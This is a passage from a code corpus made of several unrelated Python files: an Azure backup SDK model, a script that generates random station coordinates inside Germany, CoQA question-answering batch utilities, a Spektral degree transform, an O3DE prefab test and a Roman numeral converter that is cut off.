~azure.mgmt.recoveryservicesbackup.models.ProtectionState
:param health_status: Health status of protected item. Possible values
include: 'Passed', 'ActionRequired', 'ActionSuggested', 'Invalid'
:type health_status: str or
~azure.mgmt.recoveryservicesbackup.models.HealthStatus
:param health_details: Health details on this backup item.
:type health_details:
list[~azure.mgmt.recoveryservicesbackup.models.AzureIaaSVMHealthDetails]
:param last_backup_status: Last backup operation status.
:type last_backup_status: str
:param last_backup_time: Timestamp of the last backup operation on this
backup item.
:type last_backup_time: datetime
:param protected_item_data_id: Data ID of the protected item.
:type protected_item_data_id: str
:param extended_info: Additional information for this backup item.
:type extended_info:
~azure.mgmt.recoveryservicesbackup.models.AzureIaaSVMProtectedItemExtendedInfo
"""
_validation = {
'protected_item_type': {'required': True},
}
_attribute_map = {
'backup_management_type': {'key': 'backupManagementType', 'type': 'str'},
'workload_type': {'key': 'workloadType', 'type': 'str'},
'container_name': {'key': 'containerName', 'type': 'str'},
'source_resource_id': {'key': 'sourceResourceId', 'type': 'str'},
'policy_id': {'key': 'policyId', 'type': 'str'},
'last_recovery_point': {'key': 'lastRecoveryPoint', 'type': 'iso-8601'},
'backup_set_name': {'key': 'backupSetName', 'type': 'str'},
'create_mode': {'key': 'createMode', 'type': 'str'},
'protected_item_type': {'key': 'protectedItemType', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'virtual_machine_id': {'key': 'virtualMachineId', 'type': 'str'},
'protection_status': {'key': 'protectionStatus', 'type': 'str'},
'protection_state': {'key': 'protectionState', 'type': 'str'},
'health_status': {'key': 'healthStatus', 'type': 'str'},
'health_details': {'key': 'healthDetails', 'type': '[AzureIaaSVMHealthDetails]'},
'last_backup_status': {'key': 'lastBackupStatus', 'type': 'str'},
'last_backup_time': {'key': 'lastBackupTime', 'type': 'iso-8601'},
'protected_item_data_id': {'key': 'protectedItemDataId', 'type': 'str'},
'extended_info': {'key': 'extendedInfo', 'type': 'AzureIaaSVMProtectedItemExtendedInfo'},
}
def __init__(self, **kwargs):
super(AzureIaaSClassicComputeVMProtectedItem, self).__init__(**kwargs)
self.protected_item_type = 'Microsoft.ClassicCompute/virtualMachines'
| 51.205357
| 97
| 0.689451
|
362bae8cd1471781ad007519d81a9927002d7339
| 5,093
|
py
|
Python
|
Upscaled_data/upscaled_only_pts.py
|
HsKA-OSGIS/PostRep
|
6e35842067cf0f69d1c1c7b2e1d0731b6cdb550a
|
[
"MIT"
] | 5
|
2018-12-02T21:12:16.000Z
|
2019-08-07T08:00:06.000Z
|
Upscaled_data/upscaled_only_pts.py
|
HsKA-OSGIS/PostRep
|
6e35842067cf0f69d1c1c7b2e1d0731b6cdb550a
|
[
"MIT"
] | null | null | null |
Upscaled_data/upscaled_only_pts.py
|
HsKA-OSGIS/PostRep
|
6e35842067cf0f69d1c1c7b2e1d0731b6cdb550a
|
[
"MIT"
] | null | null | null |
import shapefile
import csv
from random import uniform, random, choice
from string import ascii_uppercase, ascii_lowercase
from time import time
initial_time = time()
#-----------------------------------------------------------------------------
#---------------------------- Functions ----------------------------
def polygon_coord_from_shp(file):
""" Reads shapefile and extracts the coordinates of the polygon
- Uses first feature
- file: shapefile with path"""
shape = shapefile.Reader(file)
# first feature of the shapefile
feature = shape.shapeRecords()[0]
first = feature.shape.__geo_interface__ # GeoJSON format
polygon = list(first['coordinates'][0])
return polygon
def point_in_polygon(x, y, polygon):
""" Check if a point is inside a polygon
- x,y - Coordinates of the point
- polygon - List of the vertices of the polygon [(x1, x2), (x2, y2), ..., (xn, yn)]"""
i = 0
j = len(polygon) - 1
res = False
for i in range(len(polygon)):
if (polygon[i][1] < y and polygon[j][1] >= y) \
or (polygon[j][1] < y and polygon[i][1] >= y):
if polygon[i][0] + (y - polygon[i][1]) / (polygon[j][1] - polygon[i][1]) * (
polygon[j][0] - polygon[i][0]) < x:
res = not res
j = i
return res
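def _demo_point_in_polygon():
    """Illustrative only (not from the original script): the centre of the
    unit square is inside it, a point at (2, 2) is not."""
    square = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
    assert point_in_polygon(0.5, 0.5, square)
    assert not point_in_polygon(2.0, 2.0, square)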
#-----------------------------------------------------------------------------
# Empty lists and others variables
all_data_list, date_list, city_list = [], [], []
coord_list, coord_list2, coord_list3 = [], [], []
new_list_city, new_list_x, new_list_y, new_list_z = [], [], [], []
x_min, y_min, z_min = 99999, 99999, 99999
x_max, y_max, z_max = -99999, -99999, -99999
cont=0
#-----------------------------------------------------------------------------
#------------------------- Times to upscale data: ------------------------
t = 1000
print('Times to upscale is: ' + str(t))
""" Open the original file from \home\user\PostRep\input
It is delimited by commas (,). The header has to be added manually.
- Format for header:
id,city,x,y,z,date,time,value
"""
print('Opening the files..')
f = open("/home/user/PostRep/input/data.csv", "r")
reader = csv.DictReader(f, delimiter=',')
'''Creating a new csv file:
That file is used to test the upscaled data.
It will be introduced as the relation table station_info in the DataBase.'''
f2 = open("/home/user/PostRep/Upscaled_data/new_station_info_"+str(t)+".csv", 'wb')
# The names of the resulting columns for upscaled data
csv_columns = ['id','city','x','y','z']
writer = csv.DictWriter(f2,fieldnames=csv_columns)
writer.writeheader()
print('Creating lists...')
for row in reader:
# Creating a new list with: coord x, coord y, coord z and city
if row['x']+','+row['y']+','+row['z']+',' + row['city'] not in coord_list:
cont+=1
coord_list.append(row['x']+','+row['y']+','+row['z']+','+row['city'])
coord_list2.append(row['x'] + ',' + row['y'])
# Adding lines from original data
data = {'id': cont, 'city': row['city'], 'x': row['x'], 'y': row['y'], 'z': row['z']}
writer.writerow(data)
# Defining max and min for new coordinates
if x_min >= float(row['x']): x_min = float(row['x'])
if x_max <= float(row['x']): x_max = float(row['x'])
if y_min >= float(row['y']): y_min = float(row['y'])
if y_max <= float(row['y']): y_max = float(row['y'])
if z_min >= float(row['z']): z_min = float(row['z'])
if z_max <= float(row['z']): z_max = float(row['z'])
""" Since the original bourder of Germany has too much borders to check, it has been simplified."""
file2 = "/home/user/PostRep/Upscaled_data/Simplified_boundary_Germany/germany2.shp"
print('Opening shp file..')
polygon = polygon_coord_from_shp(file2) # Extract the polygon coordinates from the shapefile
# Creating new random point coordinates and city names:
print('Creating new coordinates...')
cont2=0
times = t * len(coord_list2)
while cont2<times:
x, y = uniform(x_min, x_max), uniform(y_min, y_max)
    # Check that the newly created point is inside the boundary and does not already exist
    if point_in_polygon(x, y, polygon) and (str(x) + "," + str(y)) not in coord_list2 and [x, y] not in coord_list3:
coord_list3.append([x,y])
cont2 += 1
line = {'city': choice(ascii_uppercase) + choice(ascii_lowercase) + choice(ascii_lowercase) + choice(ascii_lowercase) + choice(ascii_lowercase),
'y': "{0:.3f}".format(y),
'x': "{0:.3f}".format(x),
'z': "{0:.3f}".format(uniform(z_min, z_max)),
'id': len(coord_list) + cont2}
writer.writerow(line)
# Close the csv files
print(len(coord_list3))
f.close()
f2.close()
print ('The process is finished.')
final_time = time()
execution_time = final_time - initial_time
print ('The execution time was: '+ str(execution_time) + ' seconds.') # In seconds
| 42.798319
| 153
| 0.564697
|
e03454bd59be4a31a926ce7307bc5d4af234c279
| 21,481
|
py
|
Python
|
Utils/CoQAUtils.py
|
mpandeydev/SDnetmod
|
c8cdf6150e3cd28330359a7d81df236729522a69
|
[
"MIT"
] | 1
|
2019-04-03T18:30:53.000Z
|
2019-04-03T18:30:53.000Z
|
Utils/CoQAUtils.py
|
mpandeydev/SDnetmod
|
c8cdf6150e3cd28330359a7d81df236729522a69
|
[
"MIT"
] | null | null | null |
Utils/CoQAUtils.py
|
mpandeydev/SDnetmod
|
c8cdf6150e3cd28330359a7d81df236729522a69
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import re
import os
import sys
import random
import string
import logging
import argparse
import unicodedata
from shutil import copyfile
from datetime import datetime
from collections import Counter
from collections import defaultdict
import torch
import msgpack
import json
import numpy as np
import pandas as pd
from Models.Bert.tokenization import BertTokenizer
from Utils.GeneralUtils import normalize_text, nlp
from Utils.Constants import *
from torch.autograd import Variable
from tqdm import tqdm
POS = {w: i for i, w in enumerate([''] + list(nlp.tagger.labels))}
ENT = {w: i for i, w in enumerate([''] + nlp.entity.move_names)}
def build_embedding(embed_file, targ_vocab, wv_dim):
vocab_size = len(targ_vocab)
emb = np.random.uniform(-1, 1, (vocab_size, wv_dim))
emb[0] = 0 # <PAD> should be all 0 (using broadcast)
w2id = {w: i for i, w in enumerate(targ_vocab)}
lineCnt = 0
with open(embed_file, encoding="utf8") as f:
for line in f:
lineCnt = lineCnt + 1
if lineCnt % 100000 == 0:
print('.', end='', flush=True)
elems = line.split()
token = normalize_text(''.join(elems[0:-wv_dim]))
if token in w2id:
emb[w2id[token]] = [float(v) for v in elems[-wv_dim:]]
return emb
def token2id_sent(sent, w2id, unk_id=None, to_lower=False):
if to_lower:
sent = sent.lower()
w2id_len = len(w2id)
ids = [w2id[w] if w in w2id else unk_id for w in sent]
return ids
def char2id_sent(sent, c2id, unk_id=None, to_lower=False):
if to_lower:
sent = sent.lower()
cids = [[c2id["<STA>"]] + [c2id[c] if c in c2id else unk_id for c in w] + [c2id["<END>"]] for w in sent]
return cids
def token2id(w, vocab, unk_id=None):
return vocab[w] if w in vocab else unk_id
'''
Generate feature per context word according to its exact match with question words
'''
def feature_gen(context, question):
counter_ = Counter(w.text.lower() for w in context)
total = sum(counter_.values())
term_freq = [counter_[w.text.lower()] / total for w in context]
question_word = {w.text for w in question}
question_lower = {w.text.lower() for w in question}
question_lemma = {w.lemma_ if w.lemma_ != '-PRON-' else w.text.lower() for w in question}
match_origin = [w.text in question_word for w in context]
match_lower = [w.text.lower() in question_lower for w in context]
match_lemma = [(w.lemma_ if w.lemma_ != '-PRON-' else w.text.lower()) in question_lemma for w in context]
C_features = list(zip(term_freq, match_origin, match_lower, match_lemma))
return C_features
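'''
A hypothetical sanity check (not in the original file): run feature_gen on a
tiny context/question pair tokenized with the module-level spacy pipeline.
'''
def _demo_feature_gen():
    context = nlp('The cat sat on the mat')
    question = nlp('Where did the cat sit?')
    # one (term_freq, match_origin, match_lower, match_lemma) tuple per context word
    return feature_gen(context, question)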
'''
Get upper triangle matrix from start and end scores (batch)
Input:
score_s: batch x context_len
score_e: batch x context_len
context_len: number of words in context
max_len: maximum span of answer
use_cuda: whether GPU is used
Output:
expand_score: batch x (context_len * context_len)
'''
def gen_upper_triangle(score_s, score_e, max_len, use_cuda):
batch_size = score_s.shape[0]
context_len = score_s.shape[1]
# batch x context_len x context_len
expand_score = score_s.unsqueeze(2).expand([batch_size, context_len, context_len]) + \
score_e.unsqueeze(1).expand([batch_size, context_len, context_len])
score_mask = torch.ones(context_len)
if use_cuda:
score_mask = score_mask.cuda()
score_mask = torch.ger(score_mask, score_mask).triu().tril(max_len - 1)
empty_mask = score_mask.eq(0).unsqueeze(0).expand_as(expand_score)
expand_score.data.masked_fill_(empty_mask.data, -float('inf'))
return expand_score.contiguous().view(batch_size, -1) # batch x (context_len * context_len)
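'''
A minimal shape-contract sketch (not in the original file): decode the best
(start, end) span from the flattened score matrix. Assumes CPU tensors.
'''
def _demo_gen_upper_triangle(context_len=4, max_len=3):
    score_s = torch.randn(1, context_len)
    score_e = torch.randn(1, context_len)
    flat = gen_upper_triangle(score_s, score_e, max_len, use_cuda=False)
    best = int(flat.argmax(dim=1)[0])
    start, end = best // context_len, best % context_len
    return start, end  # always start <= end < start + max_len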
class BatchGen:
def __init__(self, opt, data, use_cuda, vocab, char_vocab, evaluation=False):
# file_name = os.path.join(self.spacyDir, 'coqa-' + dataset_label + '-preprocessed.json')
self.data = data
self.use_cuda = use_cuda
self.vocab = vocab
self.char_vocab = char_vocab
self.evaluation = evaluation
self.opt = opt
if 'PREV_ANS' in self.opt:
self.prev_ans = self.opt['PREV_ANS']
else:
self.prev_ans = 2
if 'PREV_QUES' in self.opt:
self.prev_ques = self.opt['PREV_QUES']
else:
self.prev_ques = 0
self.use_char_cnn = 'CHAR_CNN' in self.opt
self.bert_tokenizer = None
if 'BERT' in self.opt:
if 'BERT_LARGE' in opt:
print('Using BERT Large model')
tokenizer_file = os.path.join(opt['datadir'], opt['BERT_large_tokenizer_file'])
print('Loading tokenizer from', tokenizer_file)
self.bert_tokenizer = BertTokenizer.from_pretrained(tokenizer_file)
else:
print('Using BERT base model')
tokenizer_file = os.path.join(opt['datadir'], opt['BERT_tokenizer_file'])
print('Loading tokenizer from', tokenizer_file)
self.bert_tokenizer = BertTokenizer.from_pretrained(tokenizer_file)
self.answer_span_in_context = 'ANSWER_SPAN_IN_CONTEXT_FEATURE' in self.opt
self.ques_max_len = (30 + 1) * self.prev_ans + (25 + 1) * (self.prev_ques + 1)
self.char_max_len = 30
print('*****************')
print('prev_ques :', self.prev_ques)
print('prev_ans :', self.prev_ans)
print('ques_max_len:', self.ques_max_len)
print('*****************')
c2id = {c: i for i, c in enumerate(char_vocab)}
# random shuffle for training
if not evaluation:
indices = list(range(len(self.data)))
random.shuffle(indices)
self.data = [self.data[i] for i in indices]
def __len__(self):
return len(self.data)
def bertify(self, words):
if self.bert_tokenizer is None:
return None
bpe = ['[CLS]']
x_bert_offsets = []
for word in words:
now = self.bert_tokenizer.tokenize(word)
x_bert_offsets.append([len(bpe), len(bpe) + len(now)])
bpe.extend(now)
bpe.append('[SEP]')
x_bert = self.bert_tokenizer.convert_tokens_to_ids(bpe)
return x_bert, x_bert_offsets
def __iter__(self):
data = self.data
MAX_ANS_SPAN = 15
for datum in tqdm(data):
if not self.evaluation:
# remove super long answers for training
datum['qas'] = [qa for qa in datum['qas'] if
len(qa['annotated_answer']['word']) == 1
or qa['answer_span'][1] - qa['answer_span'][0] < MAX_ANS_SPAN]
if len(datum['qas']) == 0:
continue
context_len = len(datum['annotated_context']['wordid'])
x_len = context_len
qa_len = len(datum['qas'])
batch_size = qa_len
x = torch.LongTensor(1, x_len).fill_(0)
x_char = torch.LongTensor(1, x_len, self.char_max_len).fill_(0)
if 'BERT' in self.opt:
x_bert, x_bert_offsets = self.bertify(datum['annotated_context']['word'])
x_bert_mask = torch.LongTensor(1, len(x_bert)).fill_(1)
x_bert = torch.tensor([x_bert], dtype=torch.long)
x_bert_offsets = torch.tensor([x_bert_offsets], dtype=torch.long)
x_pos = torch.LongTensor(1, x_len).fill_(0)
x_ent = torch.LongTensor(1, x_len).fill_(0)
if self.answer_span_in_context:
x_features = torch.Tensor(batch_size, x_len, 5).fill_(0)
else:
x_features = torch.Tensor(batch_size, x_len, 4).fill_(0)
query = torch.LongTensor(batch_size, self.ques_max_len).fill_(0)
query_char = torch.LongTensor(batch_size, self.ques_max_len, self.char_max_len).fill_(0)
query_bert_offsets = torch.LongTensor(batch_size, self.ques_max_len, 2).fill_(0)
q_bert_list = []
ground_truth = torch.LongTensor(batch_size, 2).fill_(-1)
context_id = datum['id']
context_str = datum['context']
context_words = datum['annotated_context']['word']
context_word_offsets = datum['raw_context_offsets']
answer_strs = []
turn_ids = []
x[0, :context_len] = torch.LongTensor(datum['annotated_context']['wordid'])
if self.use_char_cnn:
for j in range(context_len):
t = min(len(datum['annotated_context']['charid'][j]), self.char_max_len)
x_char[0, j, :t] = torch.LongTensor(datum['annotated_context']['charid'][j][:t])
x_pos[0, :context_len] = torch.LongTensor(datum['annotated_context']['pos_id'])
x_ent[0, :context_len] = torch.LongTensor(datum['annotated_context']['ent_id'])
for i in range(qa_len):
x_features[i, :context_len, :4] = torch.Tensor(datum['qas'][i]['context_features'])
turn_ids.append(int(datum['qas'][i]['turn_id']))
# query
p = 0
ques_words = []
# put in qa
for j in range(i - self.prev_ans, i + 1):
if j < 0:
                        continue
if not self.evaluation and \
datum['qas'][j]['answer_span'][
0] == -1: # questions with "unknown" answers are filtered out
continue
q = [2] + datum['qas'][j]['annotated_question']['wordid']
q_char = [[0]] + datum['qas'][j]['annotated_question']['charid']
if j >= i - self.prev_ques and p + len(q) <= self.ques_max_len:
ques_words.extend(['<Q>'] + datum['qas'][j]['annotated_question']['word'])
# <Q>: 2, <A>: 3
query[i, p:(p + len(q))] = torch.LongTensor(q)
if self.use_char_cnn:
for k in range(len(q_char)):
t = min(self.char_max_len, len(q_char[k]))
query_char[i, p + k, :t] = torch.LongTensor(q_char[k][:t])
ques = datum['qas'][j]['question'].lower()
p += len(q)
a = [3] + datum['qas'][j]['annotated_answer']['wordid']
a_char = [[0]] + datum['qas'][j]['annotated_answer']['charid']
if j < i and j >= i - self.prev_ans and p + len(a) <= self.ques_max_len:
ques_words.extend(['<A>'] + datum['qas'][j]['annotated_answer']['word'])
query[i, p:(p + len(a))] = torch.LongTensor(a)
if self.use_char_cnn:
for k in range(len(a_char)):
t = min(self.char_max_len, len(a_char[k]))
query_char[i, p + k, :t] = torch.LongTensor(a_char[k][:t])
p += len(a)
if self.answer_span_in_context:
st = datum['qas'][j]['answer_span'][0]
ed = datum['qas'][j]['answer_span'][1] + 1
x_features[i, st:ed, 4] = 1.0
if 'BERT' in self.opt:
now_bert, now_bert_offsets = self.bertify(ques_words)
query_bert_offsets[i, :len(now_bert_offsets), :] = torch.tensor(now_bert_offsets, dtype=torch.long)
q_bert_list.append(now_bert)
# answer
ground_truth[i, 0] = datum['qas'][i]['answer_span'][0]
ground_truth[i, 1] = datum['qas'][i]['answer_span'][1]
answer = datum['qas'][i]['raw_answer']
if answer.lower() in ['yes', 'yes.']:
ground_truth[i, 0] = -1
ground_truth[i, 1] = 0
answer_str = 'yes'
if answer.lower() in ['no', 'no.']:
ground_truth[i, 0] = 0
ground_truth[i, 1] = -1
answer_str = 'no'
                if answer.lower() in ['unknown', 'unknown.']:
ground_truth[i, 0] = -1
ground_truth[i, 1] = -1
answer_str = 'unknown'
if ground_truth[i, 0] >= 0 and ground_truth[i, 1] >= 0:
answer_str = answer
all_viable_answers = [answer_str]
if 'additional_answers' in datum['qas'][i]:
all_viable_answers.extend(datum['qas'][i]['additional_answers'])
answer_strs.append(all_viable_answers)
if 'BERT' in self.opt:
bert_len = max([len(s) for s in q_bert_list])
query_bert = torch.LongTensor(batch_size, bert_len).fill_(0)
query_bert_mask = torch.LongTensor(batch_size, bert_len).fill_(0)
for i in range(len(q_bert_list)):
query_bert[i, :len(q_bert_list[i])] = torch.LongTensor(q_bert_list[i])
query_bert_mask[i, :len(q_bert_list[i])] = 1
if self.use_cuda:
                    x_bert = Variable(x_bert.cuda(non_blocking=True))
                    x_bert_mask = Variable(x_bert_mask.cuda(non_blocking=True))
                    query_bert = Variable(query_bert.cuda(non_blocking=True))
                    query_bert_mask = Variable(query_bert_mask.cuda(non_blocking=True))
else:
x_bert = Variable(x_bert)
x_bert_mask = Variable(x_bert_mask)
query_bert = Variable(query_bert)
query_bert_mask = Variable(query_bert_mask)
else:
x_bert = None
x_bert_mask = None
x_bert_offsets = None
query_bert = None
query_bert_mask = None
query_bert_offsets = None
if self.use_char_cnn:
x_char_mask = 1 - torch.eq(x_char, 0)
query_char_mask = 1 - torch.eq(query_char, 0)
if self.use_cuda:
                    x_char = Variable(x_char.cuda(non_blocking=True))
                    x_char_mask = Variable(x_char_mask.cuda(non_blocking=True))
                    query_char = Variable(query_char.cuda(non_blocking=True))
                    query_char_mask = Variable(query_char_mask.cuda(non_blocking=True))
else:
x_char = Variable(x_char)
x_char_mask = Variable(x_char_mask)
query_char = Variable(query_char)
query_char_mask = Variable(query_char_mask)
else:
x_char = None
x_char_mask = None
query_char = None
query_char_mask = None
x_mask = 1 - torch.eq(x, 0)
query_mask = 1 - torch.eq(query, 0)
if self.use_cuda:
                x = Variable(x.cuda(non_blocking=True))
                x_mask = Variable(x_mask.cuda(non_blocking=True))
                x_features = Variable(x_features.cuda(non_blocking=True))
                x_pos = Variable(x_pos.cuda(non_blocking=True))
                x_ent = Variable(x_ent.cuda(non_blocking=True))
                query = Variable(query.cuda(non_blocking=True))
                query_mask = Variable(query_mask.cuda(non_blocking=True))
                ground_truth = Variable(ground_truth.cuda(non_blocking=True))
else:
x = Variable(x)
x_mask = Variable(x_mask)
x_features = Variable(x_features)
x_pos = Variable(x_pos)
x_ent = Variable(x_ent)
query = Variable(query)
query_mask = Variable(query_mask)
ground_truth = Variable(ground_truth)
yield (x, x_mask, x_char, x_char_mask, x_features, x_pos, x_ent, x_bert, x_bert_mask, x_bert_offsets,
query, query_mask, query_char, query_char_mask, query_bert, query_bert_mask, query_bert_offsets,
ground_truth, context_str, context_words, context_word_offsets, answer_strs, context_id, turn_ids)
# ===========================================================================
# =================== For standard evaluation in CoQA =======================
# ===========================================================================
def ensemble_predict(pred_list, score_list, voteByCnt=False):
predictions, best_scores = [], []
pred_by_examples = list(zip(*pred_list))
score_by_examples = list(zip(*score_list))
for phrases, scores in zip(pred_by_examples, score_by_examples):
d = defaultdict(float)
firstappear = defaultdict(int)
for phrase, phrase_score, index in zip(phrases, scores, range(len(scores))):
d[phrase] += 1. if voteByCnt else phrase_score
            if phrase not in firstappear:
firstappear[phrase] = -index
predictions += [max(d.items(), key=lambda pair: (pair[1], firstappear[pair[0]]))[0]]
best_scores += [max(d.items(), key=lambda pair: (pair[1], firstappear[pair[0]]))[1]]
return (predictions, best_scores)
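'''
Illustrative only (not in the original file): two models vote on two examples.
Scores are summed per candidate phrase; earlier models win exact ties.
'''
def _demo_ensemble_predict():
    pred_list = [['yes', 'Paris'], ['no', 'Paris']]   # one row per model
    score_list = [[0.9, 0.8], [0.4, 0.7]]
    predictions, best_scores = ensemble_predict(pred_list, score_list)
    return predictions, best_scores  # (['yes', 'Paris'], [0.9, 1.5])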
def _f1_score(pred, answers):
def _score(g_tokens, a_tokens):
common = Counter(g_tokens) & Counter(a_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1. * num_same / len(g_tokens)
recall = 1. * num_same / len(a_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
if pred is None or answers is None:
return 0
if len(answers) == 0:
return 1. if len(pred) == 0 else 0.
g_tokens = _normalize_answer(pred).split()
ans_tokens = [_normalize_answer(answer).split() for answer in answers]
scores = [_score(g_tokens, a) for a in ans_tokens]
if len(ans_tokens) == 1:
score = scores[0]
else:
score = 0
for i in range(len(ans_tokens)):
scores_one_out = scores[:i] + scores[(i + 1):]
score += max(scores_one_out)
score /= len(ans_tokens)
return score
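'''
Illustrative only (not in the original file): token-level F1 is computed on
normalized answers; with several gold answers a leave-one-out average is used.
'''
def _demo_f1_score():
    assert _f1_score('The cat', ['cat']) == 1.0                      # article stripped
    assert round(_f1_score('the cat sat', ['the cat']), 2) == 0.67   # partial overlap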
def score(pred, truth, final_json):
assert len(pred) == len(truth)
no_ans_total = no_total = yes_total = normal_total = total = 0
no_ans_f1 = no_f1 = yes_f1 = normal_f1 = f1 = 0
all_f1s = []
for p, t, j in zip(pred, truth, final_json):
total += 1
this_f1 = _f1_score(p, t)
f1 += this_f1
all_f1s.append(this_f1)
if t[0].lower() == 'no':
no_total += 1
no_f1 += this_f1
elif t[0].lower() == 'yes':
yes_total += 1
yes_f1 += this_f1
elif t[0].lower() == 'unknown':
no_ans_total += 1
no_ans_f1 += this_f1
else:
normal_total += 1
normal_f1 += this_f1
f1 = 100. * f1 / total
if no_total == 0:
no_f1 = 0.
else:
no_f1 = 100. * no_f1 / no_total
if yes_total == 0:
yes_f1 = 0
else:
yes_f1 = 100. * yes_f1 / yes_total
if no_ans_total == 0:
no_ans_f1 = 0.
else:
no_ans_f1 = 100. * no_ans_f1 / no_ans_total
normal_f1 = 100. * normal_f1 / normal_total
result = {
'total': total,
'f1': f1,
'no_total': no_total,
'no_f1': no_f1,
'yes_total': yes_total,
'yes_f1': yes_f1,
'no_ans_total': no_ans_total,
'no_ans_f1': no_ans_f1,
'normal_total': normal_total,
'normal_f1': normal_f1,
}
return result, all_f1s
def score_each_instance(pred, truth):
assert len(pred) == len(truth)
total = 0
f1_scores = []
for p, t in zip(pred, truth):
total += 1
f1_scores.append(_f1_score(p, t))
f1_scores = [100. * x / total for x in f1_scores]
return f1_scores
def _normalize_answer(s):
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
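# Illustrative only: _normalize_answer("The  Cat's toy!") == 'cats toy'
# (lowercased, punctuation dropped, articles removed, whitespace collapsed).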
class AverageMeter(object):
"""Computes and stores the average and current value."""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
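'''
Illustrative only (not in the original file): track a running average, e.g. of
per-batch losses, weighting each update by its batch size n.
'''
def _demo_average_meter():
    meter = AverageMeter()
    meter.update(0.5, n=2)   # batch of 2 with mean loss 0.5
    meter.update(1.0, n=1)   # batch of 1 with loss 1.0
    return meter.avg         # (0.5 * 2 + 1.0 * 1) / 3 ~= 0.667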
| 39.7061
| 120
| 0.539733
|
b150d8f00cabf318f3db41541b049673749dcce5
| 1,071
|
py
|
Python
|
spektral/transforms/degree.py
|
colliner/spektral
|
b776200fd1fa820f05b559f0c1c6265e0eca4894
|
[
"MIT"
] | null | null | null |
spektral/transforms/degree.py
|
colliner/spektral
|
b776200fd1fa820f05b559f0c1c6265e0eca4894
|
[
"MIT"
] | null | null | null |
spektral/transforms/degree.py
|
colliner/spektral
|
b776200fd1fa820f05b559f0c1c6265e0eca4894
|
[
"MIT"
] | null | null | null |
import numpy as np
from spektral.utils import one_hot
class Degree(object):
"""
Concatenates to each node attribute the one-hot degree of the corresponding
node.
The adjacency matrix is expected to have integer entries and the degree is
cast to integer before one-hot encoding.
**Arguments**
- `max_degree`: the maximum degree of the nodes, i.e., the size of the
one-hot vectors.
"""
def __init__(self, max_degree):
self.max_degree = max_degree
def __call__(self, graph):
if 'a' not in graph:
raise ValueError('The graph must have an adjacency matrix')
degree = graph.a.sum(1).astype(int)
if isinstance(degree, np.matrix):
degree = np.asarray(degree)[:, 0]
degree = one_hot(degree, self.max_degree + 1)
if 'x' not in graph:
graph.x = degree
else:
graph.x = np.concatenate((graph.x, degree), axis=-1)
return graph
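# A hypothetical usage sketch (not part of spektral); assumes the
# spektral.data.Graph container, which supports membership checks like
# `'a' in graph`.
def _demo_degree():
    from spektral.data import Graph
    a = np.array([[0, 1, 0],
                  [1, 0, 1],
                  [0, 1, 0]])                # 3-node path graph: degrees 1, 2, 1
    graph = Degree(max_degree=2)(Graph(x=np.ones((3, 1)), a=a))
    return graph.x.shape                     # (3, 4): 1 feature + 3 one-hot columns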
class MaxDegree(object):
def __call__(self, graph):
return graph.a.sum(1).max()
| 26.775
| 79
| 0.62465
|
9ae4614d807d6101de5e2d02b76b06e44c9a466f
| 1,068
|
py
|
Python
|
AutomatedTesting/Gem/PythonTests/Prefab/tests/PrefabBasicWorkflow_CreateAndDeletePrefab.py
|
NickR49/o3de
|
74d74050f2cd2f1c54fdfa2a9303c29d300adf34
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
AutomatedTesting/Gem/PythonTests/Prefab/tests/PrefabBasicWorkflow_CreateAndDeletePrefab.py
|
NickR49/o3de
|
74d74050f2cd2f1c54fdfa2a9303c29d300adf34
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
AutomatedTesting/Gem/PythonTests/Prefab/tests/PrefabBasicWorkflow_CreateAndDeletePrefab.py
|
NickR49/o3de
|
74d74050f2cd2f1c54fdfa2a9303c29d300adf34
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
def PrefabBasicWorkflow_CreateAndDeletePrefab():
CAR_PREFAB_FILE_NAME = 'car_prefab'
from editor_python_test_tools.editor_entity_utils import EditorEntity
from editor_python_test_tools.prefab_utils import Prefab
import PrefabTestUtils as prefab_test_utils
prefab_test_utils.open_base_tests_level()
# Creates a new Entity at the root level
# Asserts if creation didn't succeed
car_entity = EditorEntity.create_editor_entity()
car_prefab_entities = [car_entity]
    # Asserts if prefab creation doesn't succeed
_, car = Prefab.create_prefab(
car_prefab_entities, CAR_PREFAB_FILE_NAME)
# Asserts if prefab deletion fails
Prefab.remove_prefabs([car])
if __name__ == "__main__":
from editor_python_test_tools.utils import Report
Report.start_test(PrefabBasicWorkflow_CreateAndDeletePrefab)
| 31.411765
| 97
| 0.77809
|
bd0a492fae1f60a8ef3cf76f6bade7c2dcfcaff8
| 834
|
py
|
Python
|
Lecture.10/9.roman_add.py
|
joonion/coding-for-problem-solving
|
9f7a0b7e18803c58596899595dacc87a74b1b9d1
|
[
"MIT"
] | null | null | null |
Lecture.10/9.roman_add.py
|
joonion/coding-for-problem-solving
|
9f7a0b7e18803c58596899595dacc87a74b1b9d1
|
[
"MIT"
] | null | null | null |
Lecture.10/9.roman_add.py
|
joonion/coding-for-problem-solving
|
9f7a0b7e18803c58596899595dacc87a74b1b9d1
|
[
"MIT"
] | null | null | null |
def to_arabic(roman):
table = {"I":1, "V":5, "X":10, "L":50, "C":100, "D":500, "M":1000}
n = len(roman)
number = 0
for i in range(n):
if i < n - 1 and table[roman[i]] < table[roman[i + 1]]:
number -= table[roman[i]]
else:
number += table[roman[i]]
return number
def to_roman(N):
table={1000:'M', 900:'CM', 500:'D', 400:'CD', 100:'C', 90:'XC', 50:'L', 40:'XL', 10:'X', 9:'IX', 5:'V', 4:'IV', 1:'I'}
roman = ""
    for key in sorted(table.keys(), reverse=True):
while N >= key:
roman += table[key]
N -= key
return roman
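# Illustrative sanity checks (not part of the original script):
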